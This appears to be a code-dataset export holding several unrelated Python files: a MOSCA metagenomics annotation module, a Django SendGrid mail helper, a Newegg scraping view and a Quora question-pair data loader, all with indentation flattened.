ids_unmapped_output = '/'.join(output.split('/')[:-1]) + '/ids_unmapped.txt'
ids_missing = list(set(all_ids) - set(ids_done))
print('IDs present in blast file: ' + str(len(all_ids)))
print('IDs present in uniprotinfo file: ' + str(len(ids_done)))
print('IDs missing: ' + str(len(ids_missing)))
while len(ids_missing) > 0 and tries < max_iter:
print('Information already gathered for ' + str(len(ids_done)) +
' ids. Still missing for ' + str(len(ids_missing)) + '.')
uniprotinfo = self.get_uniprot_information(ids_missing,
columns = columns, databases = databases)
ids_done += list(set(uniprotinfo['Entry']))
result = result[uniprotinfo.columns]
result = pd.concat([result, uniprotinfo])
ids_missing = list(set(all_ids) - set(ids_done))
if len(ids_missing) > 0:
print('Failed to retrieve information for some IDs. Retrying request.')
tries += 1
result.to_csv(output, sep = '\t', index = False)
if len(ids_missing) == 0:
print('Results for all IDs are available at ' + output)
else:
open(ids_unmapped_output, 'w').write('\n'.join(ids_missing))
print('Maximum iterations were made. Results related to ' + str(len(ids_missing)) +
' IDs were not obtained. IDs with missing information are available' +
' at ' + ids_unmapped_output + ' and information obtained is available' +
' at ' + output)
'''
Input:
pathway: a String row from UniProt's 'Pathway' column
Output:
returns List of pathways included in that row
'''
def split(self, pathway):
pathway = pathway.split('. ')
return [path for path in pathway if path != '']
'''
Input:
ec: a String row from UniProt's 'EC number' column
Output:
returns List of EC numbers included in that row
'''
def split_ec(self, ec):
ec = ec.split('; ')
return [ec_number for ec_number in ec if ec_number != '']
'''
Input:
pathway: a String row from UniProt's 'Pathway' column
Output:
Reeives a pd.DataFrame object and breaks the list elements in the 'Pathway'
column, multiplicating the rows with several elements of 'Pathway' into
individual 'Pathway' elements, each with its row
'''
def using_repeat(self, df, column = 'Pathway'):
import numpy as np
import pandas as pd
lens = [len(item) for item in df[column]]
dictionary = dict()
for column in df.columns:
dictionary[column] = np.repeat(df[column].values,lens)
dictionary[column] = np.concatenate(df[column].values)
return pd.DataFrame(dictionary)
'''
Input:
uniprotinfo: information from UniProt ID mapping
blast: blast file from DIAMOND annotation
output: basename for EXCEL files to output
Output:
Two EXCEL files formated for Krona plotting with taxonomic and functional
information.
This function is very useful if wanting to use UniProt 'Pathway' information,
as it uses the three previous functions to organize the information from
that column into the three functional levels of UniProt Pathways.
This function was very cool
'''
def uniprotinfo_to_excel(self, uniprotinfo, blast, output):
blast = mtools.parse_blast(blast)
uniprotdf = pd.read_csv(uniprotinfo, sep = '\t', index_col = 0).drop_duplicates()
pbar = ProgressBar()
blast['Coverage'] = [float(ide.split('_')[5]) for ide in pbar(blast.qseqid)]
pbar = ProgressBar()
blast['ID'] = [ide.split('|')[-1] for ide in pbar(blast.sseqid)]
uniprotdf = pd.merge(uniprotdf, blast, left_index = True, right_on = 'ID')
tax_columns = ['Taxonomic lineage (SUPERKINGDOM)','Taxonomic lineage (PHYLUM)',
'Taxonomic lineage (CLASS)','Taxonomic lineage (ORDER)',
'Taxonomic lineage (FAMILY)','Taxonomic lineage (GENUS)',
'Taxonomic lineage (SPECIES)','Coverage']
taxdf = uniprotdf[tax_columns].groupby(tax_columns[:-1])['Coverage'].sum().reset_index()
taxdf.to_excel(output + '_taxonomic_krona.xlsx', index = False)
print('Saved taxonomy')
func_columns = ['Pathway','Protein names','EC number']
funcdf = uniprotdf[uniprotdf.Pathway.notnull()][func_columns + ['Coverage']]
funcdf.Pathway = funcdf.Pathway.apply(self.split)
funcdf = self.using_repeat(funcdf)
pathways = pd.DataFrame([(path.split('; ') + [np.nan] * (3 - len(path.split('; '))))
for path in funcdf.Pathway], index = funcdf.index)
pathways.columns = ['Superpathway','Pathway','Subpathway']
del funcdf['Pathway']
funcdf = pd.concat([pathways, funcdf], axis = 1)
funcdf = funcdf[['Superpathway','Pathway','Subpathway','EC number',
'Protein names','Coverage']]
funcdf = funcdf.groupby(funcdf.columns.tolist()[:-1])['Coverage'].sum().reset_index()
funcdf.to_excel(output + '_functional_krona.xlsx', index = False)
print('Saved pathways')
def info_with_coverage_metaspades(self, blast, output):
blast = mtools.parse_blast(blast)
coverage = pd.Series([float(ide.split('_')[5]) for ide in blast.qseqid])
blast['coverage'] = coverage.values
coverage_values = list(set(blast.coverage))
result = pd.DataFrame()
for value in coverage_values:
print(value)
ids = [ide.split('|')[-1] for ide in blast[blast['coverage'] == value]['sseqid']]
print(len(ids))
try:
part = self.get_uniprot_information(ids)
part['coverage'] = pd.Series([value for i in range(len(part))]).values
result = pd.concat([result, part])
except:
try:
part = self.get_uniprot_information(ids)
part['coverage'] = pd.Series([value for i in range(len(part))]).values
result = pd.concat([result, part])
except:
result.to_csv(output, sep = '\t', index = False)
with open('errors.log', 'a') as f:
f.write(str(value) + ' failed')
continue
result.to_csv(output, sep = '\t', index = False)
def ni_proteins(self, fasta, blast, output, ni_proteins = True):
proteins = mtools.parse_fasta(fasta)
blast = mtools.parse_blast(blast)
blast.index = blast.qseqids
ids = list(blast[blast.sseqid == '*'].index) if ni_proteins == True else list(blast[blast.sseqid != '*'].index)
handler = open(output, 'w')
for ide in ids:
if '*' not in proteins[ide]:
handler.write('>' + ide + '\n' + proteins[ide] + '\n')
handler.close()
def parse_interproscan_output(self, file):
df = pd.read_csv(file, sep = '\t', header = None)
df.columns = ['Protein Accession', 'Sequence MD5 digest', 'Sequence Length',
'Analysis', 'Signature Accession', 'Signature Description',
'Start location', 'Stop location', 'Score', 'Status', 'Date',
'InterPro annotations - accession', 'InterPro annotations - description',
'GO annotations', 'Pathways annotations']
return df
def correct_interproscan_file(self, file):
lines = open(file).readlines()
lines = [line.rstrip('\n') + '\t' * (14-line.count('\t')) + '\n' for line in lines]
handler = open(file, 'w')
handler.write(''.join(lines))
handler.close()
'''
Input:
blast: name of an annotated blast file, probably with a lot of not identified (*) proteins
interproscan: name of an InterProScan result file with hopefully CDD annotations
output: name of file to output
Output:
an annotated blast file where, if the respectively protein had identifications in
CDD database, now in the place of proteins names, it has the CDD IDs (may result in additional
lines for such protein, since several domains might be identified) (output)
'''
def blast2cddblast(self, blast, interproscan, output, correct_interproscan = True):
blastdf = mtools.parse_blast(blast)
if correct_interproscan: self.correct_interproscan_file(interproscan)
interproscandf = self.parse_interproscan_output(interproscan)
interproscandf = interproscandf[interproscandf['Analysis'] == 'CDD']
cddblastdf = pd.DataFrame(columns = blastdf.columns)
print('Building BLAST file with CDD annotations...')
pbar = ProgressBar()
for i in pbar(range(len(interproscandf))):
line = blastdf.iloc[i]
line['sseqid'] = interproscandf.iloc[i]['Signature Accession']
cddblastdf = cddblastdf.append(line)
cddblastdf.to_csv(output, index = False, header = False, sep = '\t')
'''
Input: name of a fasta file of proteins to be annotated
COG blast DB namebase from ftp://ftp.ncbi.nlm.nih.gov/pub/mmdb/cdd/little_endian/Cog_LE.tar.gz
name of output file
Output: annotated file with CDD IDs
'''
def run_rpsblast(self, fasta, output, cog, threads = '0'):
bashCommand = ('rpsblast -query ' + fasta + ' -db "' + cog + '" -out ' +
output + ' -outfmt 6 -num_threads ' + threads +
' -max_target_seqs 1')
open('MOSCA/Databases/COG/command.bash', 'w').write(bashCommand + '\n') # subprocess was not handling well running this command, so an intermediate file is written with the command to run
print(bashCommand)
mtools.run_command('bash MOSCA/Databases/COG/command.bash')
os.remove('MOSCA/Databases/COG/command.bash')
def run_recursively_rpsblast(self, fasta, output, cog, threads = '0', max_tries = 5):
all_mapped = False
tries = 1
while not all_mapped and tries < max_tries:
(f_file, o_file) = (fasta, output) if tries == 0 else (
fasta + '1', output + '1')
self.run_rpsblast(f_file, o_file, cog, threads = threads)
print('Checking if all IDs were mapped to COG database.') # rpsblast self-reportedly runs out of memory, and the solution here is to re-annotate with the unmapped proteins
if os.path.getsize(o_file) > 0: # if rpsblast was able to make new annotations
blast = mtools.parse_blast(o_file)
fastadf = pd.DataFrame.from_dict(mtools.parse_fasta(f_file),
orient = 'index').reset_index()
fastadf.columns = ['qseqid', 'sequence']
unmapped_ids = set(fastadf['qseqid']) - set(blast['qseqid'])
print(str(len(unmapped_ids)) + ' IDs still not annotated.')
if len(unmapped_ids) > 0: # if some proteins queried are not present in final output, write new fasta file with those proteins for new annotation
fastadf = fastadf[fastadf['qseqid'].isin(unmapped_ids)]
fastadf['qseqid'] = '>' + fastadf['qseqid']
fastadf.to_csv(fasta + '1', sep = '\n', index = False,
header = False)
else:
all_mapped = True
if tries > 0:
mtools.run_command('cat {} {}'.format(output, output + '1'),
file = output + '2')
os.rename(output + '2', output)
#else: # rpsblast can't annotate more sequences
tries += 1
if os.path.isfile(output + '1'):
os.remove(output + '1')
if len(set(fastadf['qseqid']) - set(blast['qseqid'])) > 0:
unmapped_file = fasta.replace('.faa','_unmapped.faa')
open(unmapped_file, 'w').write('\n'.join(
set(fastadf['qseqid']) - set(blast['qseqid'])))
print('PSI-BLAST failed to functionally annotate {} proteins'.format(
str(len(set(fastadf['qseqid']) - set(blast['qseqid'])) > 0)))
print('Unmapped IDs are available at {} and results for the annotated'
+ ' proteins are available at {}'.format(unmapped_file, output))
else:
print('Results for all IDs are available at {}'.format(output))
'''
Input:
name of blast output with CDD IDs
name of cddid summary file from ftp://ftp.ncbi.nlm.nih.gov/pub/mmdb/cdd/cddid.tbl.gz
name of fun file available at ftp://ftp.ncbi.nlm.nih.gov/pub/COG/COG/fun.txt
name of whog file available at ftp://ftp.ncbi.nlm.nih.gov/pub/COG/COG/whog
name of cdd2cog script
output folder where to store the resuls folder
Output: results folder
'''
def annotate_cogs(self, blast, output, cddid, fun, whog):
mtools.run_command('perl MOSCA/scripts/cdd2cog.pl -r ' + blast + ' -c ' +
cddid + ' -f ' + fun + ' -w ' + whog)
if os.path.isdir(output + '/results'):
shutil.rmtree(output + '/results')
os.rename('results', output + '/results')
'''
Input:
cogblast: the output from cdd2go, a blast file with CDD and COG annotations
fun: the fun.txt file available at ftp://ftp.ncbi.nih.gov/pub/COG/COG/fun.txt
Output:
returns pandas.DataFrame with the functional categories intrisic levels
reorganized into corresponding columns
'''
def organize_cdd_blast(self, cogblast, fun = 'MOSCA/Databases/COG/fun.txt'):
cogblast = self.parse_cogblast(cogblast)
cogblast = cogblast[cogblast['functional categories'].notnull()]
cog_relation = self.parse_fun(fun)
data = [cog_relation[functional_category] for functional_category in cogblast['functional categories']]
result = pd.DataFrame(data)
result.columns = ['COG general functional category','COG functional category']
result = pd.concat([result[['COG general functional category','COG functional category']],
cogblast[['COG protein description','cog','qseqid']]], axis = 1)
return result
'''
Input:
cogblast: the output from cdd2go, a blast file with CDD and COG annotations
output: filename of EXCEL file to write
Output:
an EXCEL file with the COG identifications counted for krona plotting will
be written
'''
def write_cogblast(self, cogblast, output):
cogblast = self.organize_cdd_blast(cogblast)
del cogblast['qseqid'] # TODO - this is something that should be reworked in the future. self.organize_cdd_blast is called twice, and while here the qseqid is not needed, it is needed in the self.join_reports call of self.global_information
cogblast = cogblast.groupby(cogblast.columns.tolist()).size().reset_index().rename(columns={0:'count'})
cogblast.to_excel(output, index = False)
'''
Input: name of cddblast to parse
Output: pandas.DataFrame object
'''
def parse_cogblast(self, cogblast):
cogblast = pd.read_csv(cogblast, header=None, skiprows = 1, sep = '\t', low_memory=False)
cogblast = cogblast[list(range(0,14))+[18]] #several extra columns are produced because of bad formatting
cogblast.columns = ['qseqid', 'sseqid', 'pident', 'length', 'mismatch', 'gapopen',
'qstart', 'qend', 'sstart', 'send', 'evalue', 'bitscore', 'cog',
'functional categories', 'COG protein description']
return cogblast
'''
Input: the fun.txt file available at ftp://ftp.ncbi.nih.gov/pub/COG/COG/fun.txt
Output: a dictionary in the form {COG category (letter): (COG category (name), COG supercategory)}
'''
def parse_fun(self, fun):
lines = open(fun).readlines()
result = dict()
supercategory = lines[0]
i = 1
while i < len(lines):
line = lines[i].rstrip('\n')
if '[' in line:
letter = line.split('[')[-1].split(']')[0]
name = line.split('] ')[-1]
result[letter] = [supercategory.rstrip('\n'), name]
else:
supercategory = line
i += 1
return result
'''
Input:
blast: name of the file from the DIAMOND annotation
uniprotinfo: name of the uniprot information file
cog_blast: name of the COG annotation file from self.annotate_cogs
fun: name of the fun.txt file
split_pathways: boolean, if MOSCA should split the information from the
Pathway column provided by UniProt mapping
readcounts_matrix: name of the file containing protein expression
Output:
pandas.DataFrame with integration of information from UniProt and COGs
'''
def join_reports(self, blast, uniprotinfo, cog_blast,
fun = 'MOSCA/Databases/COG/fun.txt', split_pathways = False):
result = mtools.parse_blast(blast)
result.index = result.qseqid
result = result[result.sseqid != '*']
result['Entry'] = [ide.split('|')[1] for ide in result.sseqid]
uniprotinfo = pd.read_csv(uniprotinfo, sep= '\t', low_memory=False).drop_duplicates()
if split_pathways == True: # TODO - the reorganization of pathways incurs in extra lines for same IDs. Find workaround
print('Reorganizing pathways information.')
funcdf = uniprotinfo[uniprotinfo.Pathway.notnull()][['Entry','Pathway']]
funcdf.Pathway = funcdf.Pathway.apply(self.split)
funcdf = self.using_repeat(funcdf)
pathways = pd.DataFrame([(path.split('; ') + [np.nan] * (3 - len(path.split('; '))))
for path in funcdf.Pathway], index = funcdf.index)
pathways.columns = ['Superpathway','Pathway','Subpathway']
del funcdf['Pathway']; del uniprotinfo['Pathway']
funcdf = pd.concat([pathways, funcdf], axis = 1)
uniprotinfo = pd.merge(uniprotinfo, funcdf, on = ['Entry'], how = 'outer')
result = pd.merge(result, uniprotinfo, on = ['Entry'], how = 'outer')
cog_blast = self.organize_cdd_blast(cog_blast, fun)
result = pd.merge(result, cog_blast, on = ['qseqid'], how = 'outer')
print('Defining best consensus COG for each UniProt ID.')
cogs_df = pd.DataFrame()
tqdm.pandas()
cogs_df['cog'] = result.groupby('Entry')['cog'].progress_apply(lambda x:
x.value_counts().index[0] if len(x.value_counts().index) > 0 else np.nan)
cogs_relation = result[['COG general functional category','COG functional category',
'COG protein description','cog']]
cogs_df['Entry'] = cogs_df.index
cogs_relation = cogs_relation.drop_duplicates()
cogs_df = cogs_df[cogs_df['cog'].notnull()]
cogs_df = pd.merge(cogs_df, cogs_relation, on = 'cog', how = 'inner')
result.drop(['COG general functional category', 'COG functional category',
'COG protein description', 'cog'], axis=1, inplace=True)
result = pd.merge(result, cogs_df, on = 'Entry', how = 'outer')
result = result[['Entry','Taxonomic lineage (SUPERKINGDOM)',
'Taxonomic lineage (PHYLUM)','Taxonomic lineage (CLASS)',
'Taxonomic lineage (ORDER)','Taxonomic lineage (FAMILY)',
'Taxonomic lineage (GENUS)','Taxonomic lineage (SPECIES)',
'EC number', 'Ensembl transcript','Function [CC]', 'Gene names',
'Gene ontology (GO)', 'Keywords','Pathway', 'Protein existence',
'Protein families', 'Protein names','Cross-reference (BRENDA)',
'Cross-reference (BioCyc)','Cross-reference (CDD)',
'Cross-reference (InterPro)','Cross-reference (KEGG)',
'Cross-reference (KO)','Cross-reference (Pfam)',
'Cross-reference (Reactome)','Cross-reference (RefSeq)',
'Cross-reference (UniPathway)','Cross-reference (eggNOG)',
'COG general functional category', 'COG functional category',
'COG protein description','cog']]
result.columns = ['Protein ID'] + result.columns.tolist()[1:]
result = result.drop_duplicates()
return result
def run(self):
self.gene_calling(self.file, self.out_dir + '/Annotation/' + self.name, self.assembled)
self.annotation()
'''
Input:
faa: FASTA file with protein sequences to be annotated
output: name of folder where to output results
cog: name of COG
cddid: name of cddid.tbl file for COG analysis
whog: name of whog file for COG analysis
fun: name of fun.txt file for COG analysis
databases: LIST, name of databases in format for COG analysis
threads: STR, number of threads to use
Output:
pandas.DataFrame with abundance and expression information
'''
def cog_annotation(self, faa, output, cddid = 'MOSCA/Databases/COG/cddid.tbl',
whog = 'MOSCA/Databases/COG/whog', fun = 'MOSCA/Databases/COG/fun.txt',
databases = None, threads = '8'):
self.create_split_cog_db('MOSCA/Databases/COG', 'MOSCA/Databases/COG/Cog', threads = threads)
pns = glob.glob('./MOSCA/Databases/COG/Cog_' + threads + '_*.pn')
databases = [pn.split('.pn')[0] for pn in pns]
self.run_recursively_rpsblast(faa, output + '/cdd_aligned.blast', ' '.join(databases))
if os.path.isdir(os.getcwd() + '/results'): # the cdd2cog tool does not overwrite, and fails if results directory already exists
print('Eliminating ' + os.getcwd() + '/results')
shutil.rmtree(os.getcwd() + '/results', ignore_errors=True) # is not necessary when running the tool once, but better safe then sorry!
self.annotate_cogs(output + '/cdd_aligned.blast', output, cddid, fun, whog)
self.write_cogblast(output + '/results/rps-blast_cog.txt', output + '/cogs.xlsx')
def set_to_uniprotID(self, fasta, aligned, output):
pbar = ProgressBar()
result = mtools.parse_blast(aligned)
sequences = mtools.parse_fasta(fasta)
print('Changing names of ' + fasta + '\nto identifications in ' + aligned + '\nand outputing to ' + output)
with open(output,'w') as f:
for key, value in pbar(sequences.items()):
try:
f.write('>' + str(result[result.qseqid == key]['sseqid'].item()) + '\n' + value + '\n')
except:
print(result[result.qseqid == key]['sseqid'])
def global_information(self):
# Join reports
if not os.path.isfile(self.out_dir + '/Annotation/fgs.faa'):
mtools.run_command('cat ' + ' '.join(glob.glob(self.out_dir + '/Annotation/*/fgs.faa')),
self.out_dir + '/Annotation/fgs.faa')
if not os.path.isfile(self.out_dir + '/Annotation/aligned.blast'):
mtools.run_command('cat ' + ' '.join(glob.glob(self.out_dir + '/Annotation/*/aligned.blast')),
file = self.out_dir + '/Annotation/aligned.blast')
# Retrieval of information from UniProt IDs
self.recursive_uniprot_information(self.out_dir + '/Annotation/aligned.blast',
self.out_dir + '/Annotation/uniprot_info.tsv',
columns = self.columns,
databases = self.databases)
# Functional annotation with COG database
self.cog_annotation(self.out_dir + '/Annotation/fgs.faa',
self.out_dir + '/Annotation', threads = self.threads)
# Integration of all reports - BLAST, UNIPROTINFO, COG
joined = self.join_reports(self.out_dir + '/Annotation/aligned.blast',
self.out_dir + '/Annotation/uniprot_info.tsv',
self.out_dir + '/Annotation/results/rps-blast_cog.txt')
mg_names = list()
blast_files = glob.glob(self.out_dir + '/Annotation/*/aligned.blast')
for file in blast_files:
mg_name = file.split('/')[-2]
mtools.build_gff_from_contigs(self.out_dir + '/Assembly/' + mg_name + '/contigs.fasta',
self.out_dir + '/Assembly/' + mg_name + '/quality_control/alignment.gff')
mtools.run_htseq_count(self.out_dir + '/Assembly/' + mg_name + '/quality_control/alignment.sam',
self.out_dir + '/Assembly/' + mg_name + '/quality_control/alignment.gff',
self.out_dir + '/Assembly/' + mg_name + '/quality_control/alignment.readcounts',
stranded = False)
joined = mtools.define_abundance(joined,
readcounts = self.out_dir + '/Assembly/' + mg_name +
'/quality_control/alignment.readcounts', blast = file)
mg_names.append(mg_name)
if os.path.isfile(self.out_dir + '/joined_information.xlsx'):
os.remove(self.out_dir + '/joined_information.xlsx')
joined.to_csv(self.out_dir + '/joined_information.tsv', index=False, sep='\t')
print('joined was written to ' + self.out_dir + '/joined_information.tsv')
writer = pd.ExcelWriter(self.out_dir + '/joined_information.xlsx',
engine='xlsxwriter')
i = 0
j = 1
while i + 1048575 < len(joined):
joined.iloc[i:(i + 1048575)].to_excel(writer, sheet_name='Sheet ' + str(j), index = False)
j += 1
joined.iloc[i:len(joined)].to_excel(writer, sheet_name='Sheet ' + str(j), index = False)
print('joined was written to ' + self.out_dir + '/joined_information.xlsx')
self.joined2kronas(self.out_dir + '/joined_information.tsv',
output = self.out_dir + '/Annotation/krona',
mg_columns = mg_names)
return joined
'''
UniProt regularly updates its databases. As we are working with MG here, many
identifications will sometimes pertain to ORFs or pseudogenes that have been
wrongly predicted to code for proteins. It may also happen that the original
authors decided to withdraw their published sequences.
Input:
uniprotinfo: name of UniProt info file
Output:
Rows in UniProt info file that lack a species identification will be
updated to include that new information
'''
def info_from_no_species(self, uniprotinfo):
uniprotinfo = pd.read_csv(uniprotinfo, sep = '\t')
missing_uniprotinfo = uniprotinfo[uniprotinfo['Taxonomic lineage (SPECIES)'].isnull()]
ids = list(set([ide for ide in missing_uniprotinfo['Entry']]))
new_uniprotinfo = self.get_uniprot_information(ids)
print(missing_uniprotinfo)
for entry in new_uniprotinfo['Entry']:
missing_uniprotinfo[missing_uniprotinfo['Entry'] == entry] = new_uniprotinfo[new_uniprotinfo['Entry'] == entry]
print(missing_uniprotinfo)
print(new_uniprotinfo)
print(new_uniprotinfo[new_uniprotinfo['Taxonomic lineage (SPECIES)'].notnull()]['Taxonomic lineage (SPECIES)'])
new_uniprotinfo.to_csv('test.tsv', sep = '\t', index = False)
'''
Input:
smp_directory: foldername where the SMP files are. These files are
obtained from ftp://ftp.ncbi.nih.gov/pub/mmdb/cdd/cdd.tar.gz
output: basename for PN and databases
threads: STR, number of threads that the workflow will use
step: number of SMP files per database
Output:
threads - 1 databases will be outputed, each with a consecutive part of
the list of SMP files available. These databases are formated for RPS-BLAST
search
'''
def create_split_cog_db(self, smp_directory, output, threads = '6', step = None):
dbs = (open('MOSCA/Databases/COG/databases.txt').read().split('\n') if
os.path.isfile('MOSCA/Databases/COG/databases.txt') else list())
if threads in dbs:
print('Already built COG database for [' + threads + '] threads.')
else:
print('Generating COG databases for [' + threads + '] threads.')
smp_list = glob.glob(smp_directory + '/COG*.smp')
if step is None:
step = round(len(smp_list) / float(threads))
i = 0
pn_files = list()
output += '_' + threads + '_'
while i + step < len(smp_list):
pn_files.append(output + str(int(i / step)) + '.pn')
open(output + str(int(i / step)) + '.pn', 'w').write('\n'.join(smp_list[i:i + step]))
i += step
open(output + str(int(i / step)) + '.pn', 'w').write('\n'.join(smp_list[i:len(smp_list)]))
pn_files.append(output + str(int(i / step)) + '.pn')
for file in pn_files:
mtools.run_command('makeprofiledb -in ' + file + ' -title ' + file.split('.pn')[0] +
' -out ' + file.split('.pn')[0]) # -title and -out options are defaulted as input file name to -in argument; -dbtype default is 'rps'
open('MOSCA/Databases/COG/databases.txt','w').write('\n'.join(dbs + [threads]))
def kegg_mapper(self, ids, output, step = 50):
result = pd.DataFrame()
ids_failed = list()
for i in range(0, len(ids) - step, step):
try:
url = 'http://rest.kegg.jp/conv/genes/uniprot:' + '+uniprot:'.join(ids[i:i+step])
bashCommand = 'wget ' + url + ' -O ' + output
mtools.run_command(bashCommand)
result = pd.concat([result, pd.read_csv(output, sep='\t', header=None)])
print(str(round(i/len(ids) * 100),2) + '% done')
print('Already gathered ' + str(len(result)) + ' ids.')
except:
ids_failed += ids[i:i+step]
print('Mapping failed for some IDs.')
return result, ids_failed
'''
Input:
tsv: filename of TSV file to be inputed. Must have the format
value\tcategorie1\tcategorie2\t..., with no header
output: filename of HTML krona plot to output
Output:
A krona plot will be created at output if it has been specified, else
at tsv.replace('.tsv','.html')
'''
def create_krona_plot(self, tsv, output = None):
if output is None:
output = tsv.replace('.tsv','.html')
mtools.run_command('ktImportText {} {}'.format(tsv, output))
'''
Input:
tsv: filename of MOSCA result from analysis
output: basename for krona plots
mg_columns: names of columns with abundances from which to build krona plots
Output:
'''
def joined2kronas(self, joined, output, mg_columns,
taxonomy_columns = ['Taxonomic lineage (SUPERKINGDOM)',
'Taxonomic lineage (PHYLUM)',
'Taxonomic lineage (CLASS)',
'Taxonomic lineage (ORDER)',
'Taxonomic lineage (FAMILY)',
'Taxonomic lineage (GENUS)',
'Taxonomic lineage (SPECIES)'],
functional_columns = ['COG general functional category',
'COG functional category',
'COG protein description']):
data = pd.read_csv(joined, sep = '\t')
for name in mg_columns:
partial = data[[name] + taxonomy_columns]
partial.to_csv(output + '_{}_tax.tsv'.format(name), sep = '\t',
index = False, header = False)
self.create_krona_plot(output + '_tax.tsv')
partial = data[[name] + functional_columns]
partial.to_csv(output + '_{}_fun.tsv'.format(name), sep = '\t',
index = False, header = False)
self.create_krona_plot(output + '_fun.tsv')
if __name__ == '__main__':
'''
ids = DIAMOND(out = 'MOSCAfinal/Annotation/joined/aligned.blast').parse_result()['sseqid']
ids = [ide.split('|')[1] for ide in ids if ide != '*']
'''
'''
print(os.getcwd())
ui = pd.read_csv('uniprot.info',sep='\t')
found_ids = ui['Entry'].tolist()
all_ids = open('ids_missing.txt').readlines()[0].rstrip('\n').split(',')
missing_ids = [ide for ide in all_ids if ide not in found_ids]
print('Found IDs: ' + str(len(found_ids)))
print('Missing IDs: ' + str(len(missing_ids)))
'''
'''
annotater = Annotater()
result = annotater.recursive_uniprot_information('MOSCAfinal/Annotation/aligned.blast',
'MOSCAfinal/Annotation/uniprot.info1')
'''
#result = pd.concat([result, ui])
#result.to_csv('uniprot.info',sep='\t',index=False)
'''
mosca_dir = os.path.dirname(os.path.realpath(__file__))
annotater = Annotater(out_dir = 'MGMP',
fun = mosca_dir + '/Databases/COG/fun.txt',
cog = mosca_dir + '/Databases/COG/Cog',
cddid = mosca_dir + '/Databases/COG/cddid.tbl',
whog = mosca_dir + '/Databases/COG/whog',
cdd2cog_executable = mosca_dir + '/cdd2cog.pl')
annotater.global_information()
'''
annotater = Annotater(out_dir = 'MOSCAfinal', threads = '1')
annotater.cog_annotation('MOSCAfinal/Annotation/fgs_failed.faa', 'debugCOG',
threads = '12') |
18,719 | c50bb0a1532240d19a94be3a8859854e5c8ca1e7 | import requests
from django.core import validators
from audienceSutra_beta_src.utilities.email_template import verify_email_template
from ..accounts.models import EmailLogs, EmailTemplate
import sendgrid
import os
class MailHelper():
def send_external_mail(self, to_email, subject, message, email_name, additional_data={}, extra_details={}):
email_template = EmailTemplate.objects.filter(email_name=email_name).first()
if email_template:
MailHelper.sendgrid_mail(to_email=to_email, subject=subject, message=message,
email_template=email_template, additional_data=additional_data,
extra_details=extra_details)
else:
message = "Email not Sent"
MailHelper.sendgrid_mail(to_email='support@audiencesutra.com', subject=subject, message=message,
email_template=email_template, additional_data=additional_data,
extra_details=extra_details)
@staticmethod
def sendgrid_mail(to_email, subject, message, email_template, additional_data, extra_details):
sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))
if email_template.email_type == 'welcome':
from_email = "support@audiencesutra.com"
else:
from_email = "contact-us@audiencesutra.com"
data = {
"personalizations": [
{
"to": [
{
"email": to_email
}
],
"subject": subject
}
],
"from": {
"email": from_email,
"name": "AudienceSutra"
},
"categories": [
email_template.email_category
],
"content": [
{
"type": "text/html",
"value": message
}
]
}
response = sg.client.mail.send.post(request_body=data)
sendgrid_id = response.headers['X-Message-Id']
email_log = EmailLogs.objects.create(
sendgrid_id=sendgrid_id,
email_template_id=email_template.id,
sent_to=to_email
)
extra_details = dict(extra_details.items() + additional_data.items())
email_log.extra_details = extra_details
email_log.save()
def get_attachments_mailgun(attachments):
if attachments:
attachment_list = []
for file_path in attachments:
attachment_list.append(("attachment", open(file_path)))
return attachment_list
else:
return []
def verify_email(user):
try:
validators.validate_email(str(user.email).strip())
return True
except:
return False
|
18,720 | 6774c13af377ed8ad0a48ea260207153a7a5f0de | from django.shortcuts import render
import requests
from django.http import JsonResponse
import bs4
from django.conf import Settings
from crawler import models
# Create your views here.
class Crawler:
def __init__(self,url,method='GET'):
self.url = url
self.method = method
self._response = None
@property
def content(self):
return self._response.content if self._response else None
def send(self):
self._response = requests.request(self.method, self.url)
def to_bs4(self):
return bs4.BeautifulSoup(self.content, features='lxml') if self.content else None
def build_url(self):
raise NotImplementedError
class NeweggCrawler(Crawler):
def __init__(self,code):
self.code = code
super().__init__(self.build_url())
def build_url(self):
return '{base_url}/p/{code}'.format(base_url='https://www.newegg.com', code=self.code)
class Element:
def __init__(self,dom):
self.dom = dom
def parse(self):
raise NotImplementedError
class TitleElement(Element):
def parse(self):
return self.dom.body.find('h1', class_='product-title').text
class PriceElement(Element):
def parse(self):
return self.dom.body.find('li', class_='price-current').text
class Parser:
def __init__(self,dom):
self.dom = dom
def _get_element(self):
return [(attr, getattr(self, attr)) for attr in self.Meta.attrs]
def get_results(self):
result = {}
for attr,el in self._get_element():
result[attr] = el(self.dom).parse()
return result
class NeweggParser(Parser):
title = TitleElement
price = PriceElement
class Meta:
attrs = ('title','price')
def newegg(request, code):
crawler = NeweggCrawler(code)
crawler.send()
dom = crawler.to_bs4()
parser = NeweggParser(dom)
result = parser.get_results()
product = models.Product(title=result['title'], price=result['price'])
product.save()
return JsonResponse(result)
|
18,721 | 56a17affa6ff2d299bc0aa9cad01422cbd6c0492 |
import csv, re, pickle
from tqdm import tqdm
from collections import Counter
import numpy as np
bioclean = lambda t: re.sub('[.,?;*!%^&_+():-\[\]{}]', '', t.replace('"', '').replace('/', '').replace('\\', '').replace("'", '').strip().lower())
def check_texts(text1, text2):
if (not text1):
return False
if (not text2):
return False
if (len(text1.split()) <= 3):
return False
if (len(text2.split()) <= 3):
return False
if (text1 == text2[:len(text1)]):
return False
if (text2 == text1[:len(text2)]):
return False
if (all(t in set(text2.split()) for t in set(text1.split()))):
return False
return True
class DataHandler:
def __init__(self, data_path= '/home/dpappas/quora_duplicate_questions.tsv', occur_thresh=5, valid_split=0.1):
self.to_text, self.from_text = [], []
self.occur_thresh = occur_thresh
self.data_path = data_path
################################################
with open(data_path, 'rt', encoding='utf8') as tsvin:
tsvin = csv.reader(tsvin, delimiter='\t')
headers = next(tsvin)
del(headers)
for row in tqdm(tsvin, total=404291, desc='Reading file', ascii=True):
################################################
text1 = bioclean(row[3])
text2 = bioclean(row[4])
################################################
if(not check_texts(text1, text2)):
continue
################################################
self.from_text.append(text1)
self.from_text.append(text2)
self.to_text.append(text2)
self.to_text.append(text1)
################################################
print('Created {} examples'.format(len(self.from_text)))
################################################
self.train_from_text = self.from_text[:int(len(self.from_text)*(1. - valid_split))]
self.train_to_text = self.to_text[:int(len(self.to_text)*(1. - valid_split))]
self.dev_from_text = self.from_text[-int(len(self.from_text)*(valid_split)):]
self.dev_to_text = self.to_text[-int(len(self.to_text)*(valid_split)):]
print('FROM: kept {} instances for training and {} for eval'.format(len(self.train_from_text), len(self.dev_from_text)))
